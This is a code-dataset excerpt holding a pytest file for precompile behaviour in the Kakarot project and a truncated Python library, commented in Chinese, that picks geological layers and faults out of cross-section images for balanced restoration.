{"seq_id":"3712826724","text":"import pytest\nimport pytest_asyncio\nfrom starkware.starknet.testing.starknet import Starknet\n\n\n@pytest_asyncio.fixture(scope=\"module\")\nasync def precompiles(starknet: Starknet):\n    class_hash = await starknet.deprecated_declare(\n        source=\"./tests/src/kakarot/precompiles/test_precompiles.cairo\",\n        cairo_path=[\"src\"],\n        disable_hint_validation=True,\n    )\n    return await starknet.deploy(class_hash=class_hash.class_hash)\n\n\n@pytest.mark.asyncio\nclass TestPrecompiles:\n    class TestRun:\n        @pytest.mark.parametrize(\n            \"address,error_message\",\n            [\n                (0x0, \"Kakarot: UnknownPrecompile 0\"),\n                (0x2, \"Kakarot: NotImplementedPrecompile 2\"),\n                (0x5, \"Kakarot: NotImplementedPrecompile 5\"),\n                (0x6, \"Kakarot: NotImplementedPrecompile 6\"),\n                (0x7, \"Kakarot: NotImplementedPrecompile 7\"),\n                (0x8, \"Kakarot: NotImplementedPrecompile 8\"),\n            ],\n        )\n        async def test__precompiles_run(self, precompiles, address, error_message):\n            return_data, reverted = (\n                await precompiles.test__precompiles_run(address=address).call()\n            ).result\n            assert bytes(return_data).decode() == error_message\n            assert reverted\n\n    class TestIsPrecompile:\n        @pytest.mark.parametrize(\"address\", range(1, 11))\n        async def test__is_precompile_should_return_true_up_to_9(\n            self, precompiles, address\n        ):\n            is_precompile = (\n                await 
precompiles.test__is_precompile(address).call()\n ).result[0]\n assert is_precompile == (address <= 0x9)\n","repo_name":"kkrt-labs/kakarot","sub_path":"tests/src/kakarot/precompiles/test_precompiles.py","file_name":"test_precompiles.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":722,"dataset":"github-code","pt":"96"} +{"seq_id":"43647450273","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 18 13:34:08 2018\n\n@author:Wei Huajing\n@company:Nanjing University\n@e-mail:jerryweihuajing@126.com\n\n@title:基于断层牵引法的平衡恢复函数库\n\"\"\"\n\nimport copy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport object_fault_motion as o\n\n\"\"\"\n1) 调用函数中的函数不需要输入函数命名 \n2) copy和deepcopy的差别:是否改变地址\n\"\"\" \n \n#============================================================================== \n#输入路径path,读取图片,生成图片的rgb和灰度矩阵函数\n#参数show表示图片预览参数:默认为None,rgb表示开启rgb预览,gray表示灰度预览\ndef LoadImage(load_path,show=False):\n \n img_rgb=plt.imread(load_path) \n \n if show: \n #显示rgb图像\n plt.figure()\n plt.imshow(img_rgb) \n# plt.axis('off')\n \n return img_rgb\n\n#改变输入图像的尺寸:增加m行n列\ndef AddPadding(img_rgb,m,n,show=False):\n \n #改变图像的尺寸\n new_img_rgb_shape=(np.shape(img_rgb)[0]+m,\n np.shape(img_rgb)[1]+n,\n np.shape(img_rgb)[2])\n\n #这种定义背景方式最奏效\n #背景色\n background_rgb=np.array([255,255,255],dtype=np.uint8)\n \n #new_img_rgb视为底图\n new_img_rgb=np.full(new_img_rgb_shape,background_rgb) \n \n #着色\n mm,nn=int(np.floor(m/2)),int(np.floor(n/2))\n \n new_img_rgb[mm:-mm,nn:-nn]=img_rgb[:,:]\n \n if show: \n #显示rgb图像\n plt.figure()\n plt.imshow(new_img_rgb) \n# plt.axis('off')\n \n return new_img_rgb\n\n#============================================================================== \n#生成基础列表和字典\ndef GenerateListAndDict(img_rgb):\n \n #获取图中的所有地层rgb值\n layer_rgb_list=[]\n \n #well\n well=int(np.shape(img_rgb)[1]/2)\n j=well\n \n for i in range(np.shape(img_rgb)[0]):\n \n if list(img_rgb[i,j]) not in layer_rgb_list:\n \n layer_rgb_list.append(list(img_rgb[i,j]))\n \n #将矩阵拉长 \n img_rgb=img_rgb.reshape(1,np.shape(img_rgb)[0]*np.shape(img_rgb)[1],3)\n \n #获取三通道值\n img_r=img_rgb[:,:,0]\n img_g=img_rgb[:,:,1]\n img_b=img_rgb[:,:,2]\n \n #建立集合\n set_r=list(set(img_r[0]))\n set_g=list(set(img_g[0]))\n set_b=list(set(img_b[0]))\n \n #判断rgb三通道值的数量是否相等\n if len(set_r)==len(set_g)==len(set_b):\n \n #判断是否差一个断层颜色 \n if len(set_r)-len(layer_rgb_list)==1: \n \n #图像中的所有rgb-图中的所有地层rgb值\n fault_rgb=[] \n \n #删去layer_rgb_list有的元素,set_r,set_g,set_b与layer_rgb_list的差为断层rgb\n for item in layer_rgb_list:\n \n set_r.remove(item[0])\n set_g.remove(item[1])\n set_b.remove(item[2])\n \n #断层的rgb值\n fault_rgb=[set_r[-1],set_g[-1],set_b[-1]]\n \n #如果拾取的well刚好涉及到断层,需要通过几何特性来判断\n \"\"\"这里选取像素点最少的颜色为断层的rgb值\"\"\"\n if len(set_r)==len(layer_rgb_list):\n \n #各种颜色像素点数量的字典\n rgb_number_dict={}\n \n for k in range(len(layer_rgb_list)):\n \n rgb_number_dict[k]=np.sum(img_rgb==layer_rgb_list[k])\n \n #比较像素点数量的多少 \n key=list(rgb_number_dict.keys())\n value=list(rgb_number_dict.values())\n \n #得到断层的rgb值\n fault_rgb=layer_rgb_list[key[value.index(min(value))]]\n layer_rgb_list.remove(fault_rgb)\n \n #生成rgb_dict,包括layer和fault\n rgb_dict={}\n \n for i in range(len(layer_rgb_list)):\n \n rgb_dict[i+1]=layer_rgb_list[i]\n \n #索引-1代表断层fault\n rgb_dict[-1]=fault_rgb\n \n else:\n print('ERROR:重新填充')\n \n return fault_rgb,layer_rgb_list,rgb_dict\n\n#9.12\n\n#生成字典的初始化函数\ndef InitDict(img_rgb):\n \n rgb_list=[]\n \n for i in range(np.shape(img_rgb)[0]):\n \n for j in range(np.shape(img_rgb)[1]):\n \n if 
list(img_rgb[i,j].astype(int)) not in rgb_list:\n \n rgb_list.append(list(img_rgb[i,j].astype(int)))\n \n #判断背景色\n if [255,255,255] in rgb_list: \n rgb_list.remove([255,255,255]) \n \n #各种颜色像素点数量的字典\n rgb_number_dict={}\n \n for k in range(len(rgb_list)):\n \n rgb_number_dict[k]=np.sum(img_rgb==rgb_list[k])\n \n #比较像素点数量的多少 \n key=list(rgb_number_dict.keys())\n value=list(rgb_number_dict.values())\n \n #得到断层的rgb值\n fault_rgb=rgb_list[key[value.index(min(value))]]\n \n #只有layer的rgb\n import copy\n \n layer_rgb_list=copy.deepcopy(rgb_list)\n \n #删除fault的rgb\n layer_rgb_list.remove(fault_rgb)\n \n #生成rgb_dict,包括layer和fault\n rgb_dict={}\n \n for i in range(len(layer_rgb_list)):\n \n rgb_dict[i+1]=layer_rgb_list[i]\n \n #索引-1代表断层fault\n rgb_dict[-1]=fault_rgb\n \n #0代表背景色\n rgb_dict[0]=[255,255,255]\n \n #转化为img_tag\n img_tag=RGB2Tag(img_rgb,rgb_dict)\n \n #基底tag\n base_tag=GetBaseTag(img_tag)\n \n #基底egb\n base_rgb=rgb_dict[base_tag]\n \n #删除并重命名\n del rgb_dict[base_tag]\n \n #base_tag的索引定义为-2\n rgb_dict[-2]=base_rgb\n \n return rgb_dict\n\n#============================================================================== \n#字典按value搜索key\ndef DictKeyOfValue(dictionary,value):\n \n keys=list(dictionary.keys())\n values=list(dictionary.values())\n \n #要查询的值为value\n key=keys[values.index(value)]\n \n return key\n\n#获取字典子集的函数,从索引start到索引stop,不包括索引stop\ndef DictSlice(dictionary,start,stop):\n \n keys=list(dictionary.keys())\n values=list(dictionary.values()) \n \n new_dict={}\n \n for i in range(start,stop):\n new_dict[keys[i]]=values[i]\n \n return new_dict\n\n#以start为起始索引,将字典重新排序\ndef DictSortFromStart(dictionary,start):\n \n #两个字典切片\n new_dict_1=DictSlice(dictionary,start,len(dictionary))\n new_dict_2=DictSlice(dictionary,0,start)\n \n #建立新的索引列表\n keys=[]\n \n for item in list(new_dict_1.items()):\n keys.append(item[0])\n \n for item in list(new_dict_2.items()):\n keys.append(item[0])\n \n #建立新的值列表 \n values=[]\n \n for item in list(new_dict_1.items()):\n values.append(item[1])\n \n for item in list(new_dict_2.items()):\n values.append(item[1])\n \n #建立新的字典\n new_dict={}\n \n for k in range(len(dictionary)):\n new_dict[keys[k]]=values[k]\n \n return new_dict\n\n#10.16 \n#============================================================================== \n#将字典转化为频率统计字典 \ndef List2FrequencyDict(which_list):\n \n #建立集合列表\n element_list=list(set(which_list))\n \n #初始化频率列表\n frequency_list=[]\n \n #统计频率\n for this_element in element_list:\n \n that_frequency=0\n \n for element in which_list:\n \n if this_element==element:\n \n that_frequency+=1\n \n #将所有频数组合成列表\n frequency_list.append(that_frequency)\n \n #返回一个出现元素及其对应频率的列表\n return dict(zip(element_list,frequency_list))\n \n#定义一个列表中某值出现的函数\ndef CalculateFrequency(which_list,which_value):\n \n if which_value not in which_list:\n \n print('ERROR:the value not in this list')\n \n return\n \n if which_value in which_list:\n \n map_element_frequency=List2FrequencyDict(which_list)\n \n return map_element_frequency[which_value]\n \n#计算出列表中出现频率最高的元素的函数\ndef MostFrequentElement(which_list):\n \n #频率统计字典\n map_element_frequency=List2FrequencyDict(which_list)\n \n #最大频率\n the_frequency=max(list(map_element_frequency.values()))\n \n return DictKeyOfValue(List2FrequencyDict(which_list),the_frequency)\n\n#9.6\n#============================================================================== \n#补色变换\ndef ReverseRGB(img_rgb):\n \n return np.array([255,255,255]-img_rgb,dtype=np.uint8) \n\n#由img_rgb生成img_tag\ndef RGB2Tag(img_rgb,rgb_dict,show=False):\n \n 
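# Maps every pixel's RGB triple back to its tag by reverse lookup in rgb_dict; this is\n    # O(H*W) Python-level work, so on large images a vectorized pass per tag would likely be\n    # faster, e.g. (a sketch, assuming rgb_dict values are 3-element RGB lists):\n    #     for tag, rgb in rgb_dict.items():\n    #         img_tag[np.all(img_rgb == np.array(rgb), axis=-1)] = tag\n    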
img_tag=np.zeros((np.shape(img_rgb)[0],np.shape(img_rgb)[1]))\n \n #给img_tag矩阵赋值\n for i in range(np.shape(img_tag)[0]):\n \n for j in range(np.shape(img_tag)[1]):\n \n img_tag[i,j]=DictKeyOfValue(rgb_dict,list(img_rgb[i,j].astype(int)))\n \n #显示\n if show:\n plt.figure()\n plt.imshow(img_tag,cmap='gray')\n \n return img_tag\n\n#由img_tag生成img_rgb\ndef Tag2RGB(img_tag,rgb_dict,show=False):\n \n img_rgb=np.zeros((np.shape(img_tag)[0],np.shape(img_tag)[1],3))\n\n #给img_rgb矩阵赋值\n for i in range(np.shape(img_rgb)[0]):\n \n for j in range(np.shape(img_rgb)[1]):\n \n# print(img_tag[i,j])\n# print(rgb_dict[int(img_tag[i,j])])\n\n #注意dtype,必须是uint8才能正常显示RGB\n img_rgb[i,j]=np.array(rgb_dict[img_tag[i,j]])\n \n #转化为正确输出格式 \n img_rgb=np.array(img_rgb,dtype=np.uint8) \n \n #显示\n if show:\n \n plt.figure()\n plt.imshow(img_rgb)\n \n return img_rgb\n\n#9.13\n\n#计算出基底base tag的函数 设计一个\n#计算base_tag的方法\ndef GetBaseTag(img_tag):\n \n \"\"\"从图像末尾进行扫描,获取到的非背景色的tag或rgb就是\"\"\"\n for i in range(np.shape(img_tag)[0]-1,0,-1):\n \n #只要不是全空白那就一定是它咯\n if list(img_tag[i])!=list(img_tag[-1]): \n \n break\n \n #取中间值\n return img_tag[i,int(np.shape(img_tag)[1]/2)]\n\n#9.12\n#============================================================================== \n#初始化所有的fractions\ndef Initfractions(img_rgb,img_tag,rgb_dict,text=False,show=False,base='off'):\n \n #面积最大的tag\n base_tag=GetBaseTag(img_tag)\n \n #拾取出tag为2,3,4的层\n import copy\n \n fraction_rgb_dict=copy.deepcopy(rgb_dict)\n \n #删除空白rgb索引\n del fraction_rgb_dict[0]\n \n #图像中的所有fraction对象列表\n total_fractions=[]\n \n #拾取断层和地层并显示\n for this_tag in list(fraction_rgb_dict.keys()):\n \n #是否要基底的那个tag\n if base=='off':\n \n if this_tag==base_tag:\n \n continue\n \n that_fraction=PickSomething(img_rgb,img_tag,this_tag,rgb_dict)\n \n total_fractions+=that_fraction\n \n #显示total_fractions\n if show:\n ShowFractions(total_fractions,img_rgb,rgb_dict,text)\n \n return total_fractions\n \n#============================================================================== \n\"\"\"\n连通成分标记:基于链码的边界追踪算法\n从左往右,从上到下遍历所有像素点\n每个点的[i,j-1]方向为下标0的邻域,顺时针每个点的下标依次为0-7\n循环遍历,直到起点与终点的坐标相同\n\"\"\" \ndef Find1stPixel(tag,img_tag,content):\n \n #fault边缘点坐标集合\n edge=[] \n \n #开启标志\n flag=True \n \n #寻找值为tag的点的集合 \n for j in range(np.shape(img_tag)[1]):\n if flag==False:\n break \n \n for i in range(np.shape(img_tag)[0]): \n if img_tag[i,j]==tag:\n \n #第一个tag点的位置\n pos=[i,j] \n \n #判断新的的点是否存在与fault矩阵当中\n if pos not in content:\n edge.append(pos)\n flag=False\n break \n return edge\n\n\"\"\"\n以下情况需要特殊处理:\n1 S[k-1]邻域内的第一个点已在边缘集合当中,则访问下一个点 OK\n2 S[k]邻域内只有一个边缘点,即上一个点S[k-1],则访问S[k-1]邻域内下一个点 OK \n3 S[K]从上一个目标点是S[k-1]逆时针进行遍历 OK\n\"\"\" \n\n#寻找自己的第一个符合要求的邻居像素,要追踪的像素值为tag\n#第一个满足tag的pixel对象\ndef Find1stNeighbor(tag,flag_stop,edge,img_tag,index):\n \n #[i,j-1],[i+1,j-1],[i+1,j],[i+1,j+1],[i,j+1],[i-1,j+1],[i-1,j],[i-1,j-1]\n #邻域的索引和横纵坐标的索引(绝对索引)\n neighbordict={0:(0,-1),\n 1:(1,-1),\n 2:(1,0),\n 3:(1,1),\n 4:(0,1),\n 5:(-1,1),\n 6:(-1,0),\n 7:(-1,-1)}\n \n #以最后一个edge点为指针进行检索\n first_pixel=o.pixel()\n first_pixel.ypos=edge[-1][0]\n first_pixel.xpos=edge[-1][1]\n \n #3 S[K]从上一个目标点是S[k-1]逆时针进行遍历\n #重新规划索引new_index后一个索引和前一个索引呈对角关系\n #若索引大于4,归化\n\n if index<4:\n new_index=index+4\n else:\n new_index=index-4\n \n new_neighbordict=DictSortFromStart(neighbordict,new_index)\n \n #生成邻居列表,起始迭代邻居的索引\n first_pixel.GenerateNeighbor(img_tag)\n \n #邻域内邻居数量\n count=0\n\n for i in range(len(new_neighbordict)):\n \n #获取目标点的索引,转化为绝对索引\n index=list(new_neighbordict.keys())[i]\n \n #符合tag的点计数\n if first_pixel.neighbor[index]==tag:\n \n 
count+=1\n \n #建立新的pixel对象\n temp_pixel=o.pixel()\n temp_pixel.ypos=first_pixel.ypos+new_neighbordict[index][0]\n temp_pixel.xpos=first_pixel.xpos+new_neighbordict[index][1]\n pos=[temp_pixel.ypos,temp_pixel.xpos]\n \n #判断目标点和起点是否相同,不能是第一个点\n if i>0 and pos==edge[0]:\n \n flag_stop=True\n edge.append(pos)\n \n break\n \n #1 S[k-1]邻域内的第一个点已在边缘集合当中,则访问下一个点 \n if pos not in edge:\n \n edge.append(pos)\n \n break \n \n #*2 S[k]邻域内只有一个边缘点,即上一个点S[k-1],则访问S[k-1]邻域内下一个点\n if len(edge)>1 and pos==edge[-2] and count==1 and i==7:\n \n edge.append(pos)\n \n break\n \n return edge,index,flag_stop\n\n#根据fault_edge[0]追踪边界,要追踪的像素标签值为tag\ndef EdgeTracing(tag,edge,img_tag):\n \n #初始化循环中止判别标志\n flag_stop=False\n \n #初始化绝对索引\n index=-4\n \n #进行第一次邻居搜索\n edge,index,flag_stop=Find1stNeighbor(tag,flag_stop,edge,img_tag,index) \n \n while len(edge)>1 and flag_stop is False:\n edge,index,flag_stop=Find1stNeighbor(tag,flag_stop,edge,img_tag,index) \n \n return edge\n\n#============================================================================== \n#显示某个列表中的所有像素点\ndef ShowSomething(img_rgb,something,tag,rgb_dict,output=False): \n \n #显示找到的集合\n background_rgb=img_rgb[0,0]\n img_temp=np.full(np.shape(img_rgb),background_rgb)\n \n #赋予目标对象的位置\n for item in something:\n \n i,j=item[0],item[1]\n img_temp[i,j]=rgb_dict[tag] \n \n #在图中显示\n plt.figure()\n plt.imshow(img_temp)\n# plt.axis('off')\n \n if output:\n return img_temp\n \n\"\"\"设计通过显示tag和part显示块体的函数\"\"\"\n#写一个同时能显示很多tag像素点的函数,混合tag,显示对象为fraction对象的集合\n#显示多个fraction对象的函数\ndef ShowFractions(fractions,img_rgb,rgb_dict,text=False,output=False):\n \n #显示找到的内容\n background_rgb=img_rgb[0,0]\n img_temp=np.full(np.shape(img_rgb),background_rgb)\n \n #在图中显示\n plt.figure()\n \n #赋予目标对象的位置\n for this_fraction in fractions:\n \n #tag,part,content,center \n tag=this_fraction.tag\n part=this_fraction.part\n content=this_fraction.content\n center=this_fraction.center\n \n #着色\n for pos in content:\n i,j=pos[0],pos[1]\n img_temp[i,j]=rgb_dict[tag] \n \n if text: \n #annotate函数:s表示输出的文本,\n plt.annotate(s='tag'+' '+str(tag)+' '+'part'+' '+str(part),\n #xy表示中心点坐标\n xy=center,\n #xycoords表示输出类型,默认为'data'\n xycoords='data',\n #fontsize字体\n fontsize=10,\n #xytext和textcoords='offset points'对于标注位置的描述和x偏差值\n textcoords='offset points',\n #4个字符相当于2个fontsize\n xytext=(-20,0)) \n\n plt.imshow(img_temp)\n# plt.axis('off')\n \n if output:\n return img_temp\n \n#显示多个plate对象的函数\n#plates是plate对象组成的列表\ndef ShowPlates(plates,img_rgb,rgb_dict,text=False,output=False):\n \n #建立总fractions列表\n total_fractions=[]\n \n #遍历plates中的每一个plate\n for this_plate in plates:\n\n #将每一个fraction对象都放进来\n total_fractions+=this_plate.fractions\n \n #显示\n ShowFractions(total_fractions,img_rgb,rgb_dict,text,output) \n \n#============================================================================== \n\"\"\"算的太慢!!!,只能缩小尺寸\"\"\" \n\"\"\"\n填充方法:\n1 填充边界内的点,向内侵蚀\n2 阿华算法:IJ交织(已改进,解决了拾取本不该属于集合里的点的问题)\n\"\"\"\n#提取出tag值的像素点坐标的集合\ndef PickSomething(img_rgb,img_tag,tag,rgb_dict,show=False,text=False,output=False):\n \n #content_sum=Content[0]+Content[1]+...\n content_sum=[] \n \n #method=1代表方法1,method=2代表方法2\n method=2 \n \n #复制生成临时的img_tag,用于标记已上色的像素点\n temp_img_tag=copy.deepcopy(img_tag) \n \n #是否继续遍历的标志 \n content_flag=tag in temp_img_tag \n \n #块体tag a part b的重心坐标\n Center={} \n \n #Center字典增加一个新的tag列表\n Center[tag]=[] \n \n #fractions是fraction对象的集合\n fractions=[] \n \n# #已知对象数量时可以这么干\n# number=3\n# for kk in range(number):\n \n \"\"\"1 内部膨胀的方法增加像素点\"\"\" \n if method==1: \n \n #以下部分进行循环\n while content_flag: \n \n 
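# Region-growing outline of method 1: find an unvisited seed pixel carrying this tag,\n            # trace the closed boundary with the chain-code follower above, then dilate inward from\n            # the boundary, adding 8-neighbours with the same tag until a pass adds no new pixels.\n            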
#fault像素点集合的生成\n content=[]\n \n #寻找第一个特征值值点\n fault_edge,content_flag=Find1stPixel(tag,img_tag,content_sum) \n \n #追踪fault的边界\n fault_edge=EdgeTracing(tag,fault_edge,img_tag)\n \n #内部膨胀的方法增加像素点 \n neighbordict={0:(0,-1),\n 1:(1,-1),\n 2:(1,0),\n 3:(1,1),\n 4:(0,1),\n 5:(-1,1),\n 6:(-1,0),\n 7:(-1,-1)}\n \n #将边界存入fault列表当中\n new_edge=fault_edge\n content+=new_edge\n \n #只要每一轮添加的点的数量不为0就执行循环\n while len(new_edge): \n \n #上一轮添加的点\n last_edge=new_edge\n \n #这一轮新添加的点坐标的列表\n new_edge=[]\n \n for k in range(len(last_edge)):\n \n #建立新的pixel对象\n temp_pixel=o.pixel()\n temp_pixel.ypos=last_edge[k][0]\n temp_pixel.xpos=last_edge[k][1] \n \n #生成邻居列表,起始迭代邻居的索引\n temp_pixel.GenerateNeighbor(img_tag) \n \n for i in range(len(neighbordict)): \n \n #判断标签为tag\n if temp_pixel.neighbor[i]==tag:\n \n #邻居的坐标\n new_y=temp_pixel.ypos+neighbordict[i][0]\n new_x=temp_pixel.xpos+neighbordict[i][1]\n pos=[new_y,new_x]\n \n #新的点在不在fault列表内\n if pos not in o.fault:\n new_edge.append(pos) \n \n #将新捕捉的点存入fault列表当中 \n content+=new_edge \n \n \"\"\"2 阿华法增加像素点\"\"\"\n if method==2:\n \n #以下部分进行循环\n while content_flag: \n \n# 已知个数的情况\n# number=2\n# for kk in range(number): \n \n #装逼用 \n print('')\n print('...')\n print('......')\n print('.........')\n print('tag',tag,'part',len(fractions),':')\n \n #寻找第一个特征值值点\n edge=Find1stPixel(tag,img_tag,content_sum)\n\n #追踪content的边界\n edge=EdgeTracing(tag,edge,img_tag)\n \n #this_fraction表示正在处理的fraction\n \n #如果tag=-1,则fraction为fault\n if tag==-1:\n this_fraction=o.fault() \n else:\n this_fraction=o.layer() \n \n #对tag属性赋值\n this_fraction.tag=tag \n \n #给part属性赋值\n this_fraction.part=len(fractions)\n \n #给edge属性赋值\n this_fraction.edge=edge\n \n #求对象的范围矩阵\n #left right bottom top 这几个重要的参数\n I=[]\n J=[]\n \n for item in edge: \n if item[0] not in I: \n I.append(item[0])\n \n if item[1] not in J:\n J.append(item[1])\n \n #初始生成的I,J不是按顺序的,需要对其进行排序\n I.sort()\n J.sort() \n \n left,right=min(J),max(J)\n bottom,top=min(I),max(I)\n \n #获取块体的中点\n center_x=(left+right)/2\n center_y=(bottom+top)/2\n \n #标注的坐标,即块体Content[part]的中点\n center=(center_x,center_y)\n \n #对center属性赋值\n this_fraction.center=center\n \n Center[tag].append(center)\n \n #建立某特殊的数据结构,用于存放像素点的行对应的列\n row_column=[]\n column_row=[]\n \n \"\"\"is和==不一样\"\"\" \n for i in range(top-bottom+1):\n \n #行对应的列的列表\n column=[]\n for item in edge:\n if item[0]==I[i]:\n column.append(item[1])\n column.sort()\n \n #列表添加至大列表当中\n row_column.append(column)\n \n for j in range(right-left+1):\n \n #列对应的行的列表\n row=[]\n for item in edge:\n if item[1]==J[j]:\n row.append(item[0])\n row.sort()\n \n #列表添加至大列表当中\n column_row.append(row) \n \n #检验这两个数组的正确性\n sum_i,sum_j=0,0\n \n for item in row_column:\n sum_j+=len(item)\n \n for item in column_row:\n sum_i+=len(item)\n \n #设置验证门槛\n #J\n if sum_j==len(edge):\n print('row_column is OK')\n flag_j=True\n #I\n if sum_i==len(edge):\n print('column_row is OK')\n flag_i=True\n #IJ\n if sum_j==sum_i:\n if flag_i and flag_j:\n flag=True\n \n if flag is True:\n \"\"\"\n 注意:\n 过一个点做垂线和水平线可能会碰到交点是三个以上,如果其中有轮廓线的切点,就会出现判断失误 \n \n 设置节点:\n 每个节点两段点之间遍历,若符合tag要求即加入集合当中\n \"\"\" \n #在row_column和column_row当中建立合适的节点,将相邻的像素点用其中头尾节点来表示 \n \n #content像素点集合\n content=[] \n \n #row_column \n row_column_node=[] \n for r in range(len(row_column)):\n\n #要删除的列表\n column_to_delete=[]\n \n if len(row_column[r])>2:\n \n #元素数量大于2时才成立 \n for c in range(1,len(row_column[r])-1): \n\n bool_former=(row_column[r][c+1]-row_column[r][c]==1) \n bool_latter=(row_column[r][c]-row_column[r][c-1]==1)\n \n #直接删除中间元素 \n if bool_former and bool_latter:\n 
\n #建立需要删除元素的列表\n column_to_delete.append(row_column[r][c])\n \n #要增加的节点列表\n column_node=[]\n \n \"\"\"若不加这步骤,则没法把孤苦伶点的点收录进来\"\"\"\n if len(row_column[r])==1:\n column_node=row_column[r]*2\n \n else: \n #将某些元素删除\n \n for item in row_column[r]:\n if item not in column_to_delete:\n column_node.append(item)\n\n row_column_node.append(column_node)\n\n #修复方法\n fix=False\n \n #确认是否存在两个以下的节点\n if fix: \n for item in row_column_node:\n if len(item)!=2:\n print(item) \n \n #进行轮廓内部填充 \n fashion='new'\n \n #老办法,用于检验,在不特殊的情况下能得到正确答案\n #如果只有两个节点时直接用老方法填充,比较快\n if fashion=='old':\n \n for i in range(top-bottom+1): \n for j in range(right-left+1):\n \n #用abcd代替更简便\n a,b=min(row_column[i]),max(row_column[i])\n c,d=min(column_row[j]),max(column_row[j])\n \n #绝对坐标\n absolute_i=bottom+i\n absolute_j=left+j\n \n #判断是否在区域内\n if a<=absolute_j<=b and c<=absolute_i<=d:\n pos=[absolute_i,absolute_j]\n content.append(pos) \n \n #对上色过的像素点赋予tag=0\n temp_img_tag[int(pos[0]),int(pos[1])]=0 \n \n #适用于所有情况 \n if fashion=='new':\n \n for i in range(top-bottom+1): \n #行坐标欸\n row=bottom+i\n \n #列坐标 \n for ii in range(len(row_column_node[i])-1):\n \n #这个列坐标区间内的tag进行判断\n #column=(row_column[i][ii],row_column[i][ii+1])\n \n start_j=row_column_node[i][ii]\n stop_j=row_column_node[i][ii+1]\n \n #如果区间内全是符合tag的点,则加如集合\n \n \"\"\"用向量进行赋值速度快\"\"\"\n if list(img_tag[row,start_j:stop_j])==[tag]*(stop_j-start_j):\n \n #对上色过的像素点赋予tag\n temp_img_tag[row,start_j:stop_j]=0\n \n for column in range(start_j,stop_j):\n pos=[row,column]\n \n if pos not in content:\n content.append(pos) \n \n #确保边缘被收录\n for column in row_column_node[i]: \n pos=[row,column]\n \n if pos not in content:\n content.append(pos) \n \n #对上色过的像素点赋予tag=0\n temp_img_tag[int(pos[0]),int(pos[1])]=0\n \n #复制结果\n content_row_column=copy.deepcopy(content)\n \n #重新定义content像素点集合\n content=[] \n \n #column_row \n column_row_node=[] \n for c in range(len(column_row)):\n \n #要删除的列表\n row_to_delete=[]\n \n if len(column_row[c])>2:\n \n #元素数量大于2时才成立 \n for r in range(1,len(column_row[c])-1): \n\n bool_former=(column_row[c][r+1]-column_row[c][r]==1) \n bool_latter=(column_row[c][r]-column_row[c][r-1]==1)\n \n #直接删除中间元素 \n if bool_former and bool_latter:\n \n #建立需要删除元素的列表\n row_to_delete.append(column_row[c][r])\n \n #要增加的节点列表\n row_node=[]\n \n #把孤苦伶点的点收录进来\n if len(column_row[c])==1:\n row_node=column_row[c]*2\n \n else: \n #将某些元素删除 \n for item in column_row[c]:\n if item not in row_to_delete:\n row_node.append(item)\n\n column_row_node.append(row_node)\n \n #进行轮廓内部填充 \n #适用于所有情况\n for j in range(right-left+1): \n #行坐标欸\n column=left+j\n\n #列坐标 \n for jj in range(len(column_row_node[j])-1):\n \n #这个列坐标区间内的tag进行判断\n #row=(column_row[j][jj],column_row[j][jj+1])\n \n start_i=column_row_node[j][jj]\n stop_i=column_row_node[j][jj+1]\n \n #如果区间内全是符合tag的点,则加如集合\n \n \"\"\"用向量进行赋值速度快\"\"\"\n if list(img_tag[start_i:stop_i,column])==[tag]*(stop_i-start_i):\n \n #对上色过的像素点赋予tag\n temp_img_tag[start_i:stop_i,column]=0\n\n for row in range(start_i,stop_i):\n \n pos=[row,column]\n \n if pos not in content:\n content.append(pos) \n \n #确保边缘被收录\n for row in column_row_node[j]: \n \n pos=[row,column]\n \n if pos not in content:\n \n content.append(pos) \n \n #对上色过的像素点赋予tag=0\n temp_img_tag[int(pos[0]),int(pos[1])]=0 \n \n #复制结果\n content_column_row=copy.deepcopy(content)\n \n #互相验证两种收集模式的结果:比较两集合结果是否相等 \n verification=True \n for item in content_column_row:\n if item not in content_row_column:\n verification=False\n \n if verification: \n #判断结果的count\n count_for_judge=0\n \n #判断content是否包含了edge\n 
for item in edge:\n if item in content:\n count_for_judge+=1\n \n #判断列表长度是否相等 \n if count_for_judge==len(edge):\n print('content includes edge')\n \n #对content属性赋值\n this_fraction.content=content\n \n #content_sum=Content[0]+Content[1]+...\n content_sum+=content\n \n #Content[0],Content[1]是每个块体像素点的集合\n fractions.append(this_fraction)\n \n #判断循环是否需要中止:1和2代表不同方法 \n method_for_stop=2\n \n \"\"\"1 判断条件为新的img_tag是否还存在标签值\"\"\"\n #这种方法要特别久 \n if method_for_stop==1: \n \n #符合条件的tag不在content_sum中的数量\n count_for_stop=0\n for i in range(np.shape(img_tag)[0]):\n for j in range(np.shape(img_tag)[1]):\n if img_tag[i,j]==tag:\n pos=[i,j]\n if pos not in content_sum:\n count_for_stop+=1\n \n #循环结束的判断条件 \n if count_for_stop==0:\n content_flag=False\n \n \"\"\"2 判断条件为temp_img_tag是否存在tag\"\"\" \n if method_for_stop==2: \n content_flag=tag in temp_img_tag\n \n if content_flag:\n print('picking is not complete')\n else: \n print('everything is OK')\n \n #检查'everything is OK'是否成立\n check=False\n if check: \n count=0 \n for i in range(np.shape(temp_img_tag)[0]):\n for j in range(np.shape(temp_img_tag)[1]):\n if temp_img_tag[i,j]==tag:\n count+=1 \n print(count) \n \n #显示一下Content的位置\n if show:\n ShowFractions(fractions,img_rgb,rgb_dict,text,output)\n \n return fractions\n\n#============================================================================== \n#处理掉total_fractions中所有fault对象的函数\ndef DeleteFault(total_fractions):\n \n #结果fractions列表\n result_fractions=[]\n \n for this_fraction in total_fractions: \n \n if type(this_fraction) is not o.fault:\n \n result_fractions.append(this_fraction)\n \n return result_fractions \n\n#9.14\n\n#从图像中获取断层\ndef FaultFrom(total_fractions,img_rgb,show=False):\n \n print('')\n print('here comes a new fault')\n print('......')\n print('please pick the fault')\n \n #点击获取像素点坐标\n fault_point_pos=plt.ginput(1)[0]\n\n print('......')\n print('picking the fault')\n \n #注意反过来,因为是xy坐标\n pos_xy=[int(fault_point_pos[0]),int(fault_point_pos[1])]\n \n import copy\n \n pos_IJ=copy.deepcopy(pos_xy)\n \n #IJ形式是xy形式的颠倒\n pos_IJ.reverse()\n \n #所有fault的列表\n total_faults=[]\n \n #这个点到所有fault的距离列表\n distance_total_faults=[]\n \n #建立所有fault的列表\n #计算这个点到fault中心的远近\n for this_fraction in total_fractions:\n \n if isinstance(this_fraction,o.fault):\n \n #上车上车\n total_faults.append(this_fraction)\n \n #计算距离\n 